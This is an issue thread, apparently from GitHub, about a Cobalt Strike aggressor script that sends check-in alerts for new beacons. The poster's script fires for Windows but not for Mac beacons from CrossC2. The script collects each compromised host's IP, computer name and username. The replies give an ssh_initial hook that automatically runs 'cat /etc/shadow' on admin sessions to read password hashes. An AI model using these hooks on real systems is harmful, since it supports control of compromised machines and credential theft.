写了个server酱调用上线提醒，使用cross2的mac上线没有提醒

Question

写了个server酱调用上线提醒，使用cross2的mac上线没有提醒

we1h0 opened this issue 2 years ago · 3 comments

如题，windows上线正常提醒。。

on beacon_initial {

	#获取ip、计算机名、登录账号
	println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1,"pid"));
	local('$internalIP $computerName $userName');
	$internalIP = replace(beacon_info($1,"internal")," ","_");
	$computerName = replace(beacon_info($1,"computer")," ","_");
	$userName = replace(beacon_info($1,"user")," ","_");
	
	$cmd = 'python3 /Users/xxx/Tools/CobaltStrike/SeverChan/ServerChan.py' . " --computername " . $computerName . " --internalip " . $internalIP . " --username " . $userName;
	println("Sending server: " . $cmd);
	exec($cmd);
}

这什么原因呢，运行mac的cross2 没有调取cna脚本的操作。

Answer 1 · 2022-12-15T09:08:03.000Z

理论上连回来teamserver应该都会执行一遍cna脚本才对...为啥弹回来权限后没操作cna脚本..

Answer 2 · 2022-12-17T10:17:06.000Z

Mac & Linux 需使用 ssh_inital #73

on ssh_initial {
	if (-isadmin $1) {
		bshell($1, "cat /etc/shadow");
	}
}

Answer 3 · 2022-12-19T01:31:44.000Z

Mac & Linux 需要使用ssh_inital #73
on ssh_initial {
	if (-isadmin $1) {
		bshell($1, "cat /etc/shadow");
	}
}

ok,thx